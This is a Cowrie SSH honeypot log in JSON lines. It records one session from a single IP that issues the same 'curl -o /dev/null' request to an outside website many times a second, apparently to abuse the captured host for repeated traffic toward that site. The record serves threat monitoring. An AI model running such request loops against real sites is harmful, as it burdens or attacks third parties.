{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.570688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.571750Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.611982Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.613047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.650555Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.651642Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.695982Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.697027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.734331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.736206Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.793113Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.794181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.836569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.837871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.879612Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.880930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.922198Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.923202Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.962385Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.963424Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.008873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.010244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.060897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.061944Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.109421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.110487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.227032Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.228463Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.265318Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.266387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.303058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.304125Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.340892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.342279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.379844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.380966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.418601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.419705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.457816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.459125Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.496953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.498063Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.535364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.536485Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.574059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.575124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.613299Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.614337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.651289Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.652428Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.690441Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.691651Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.729590Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.730911Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.768606Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.769917Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.810189Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.811216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.853270Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.854514Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.894273Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.895384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.935970Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.936982Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:34.981157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:34.982220Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.065516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.066542Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.106532Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.107542Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.145943Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.147007Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.184266Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.185436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.222749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.223936Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.266080Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.267257Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.305624Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.306720Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.344208Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.345281Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.382129Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.383240Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.422191Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.423230Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.465069Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.466084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.504604Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.505656Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.542478Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.543492Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.580876Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.581977Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.619490Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.620516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.667896Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.669038Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.714714Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.715762Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.755637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.756746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.794501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.795645Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.836886Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.837930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.877149Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.878184Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.919462Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.920456Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.957624Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:35.958637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:35.999642Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.000705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.047501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.048720Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.095410Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.096514Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.133812Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.134888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.175067Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.176120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.212999Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.214064Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.250807Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.251878Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.305371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:36.306473Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:36.344379Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
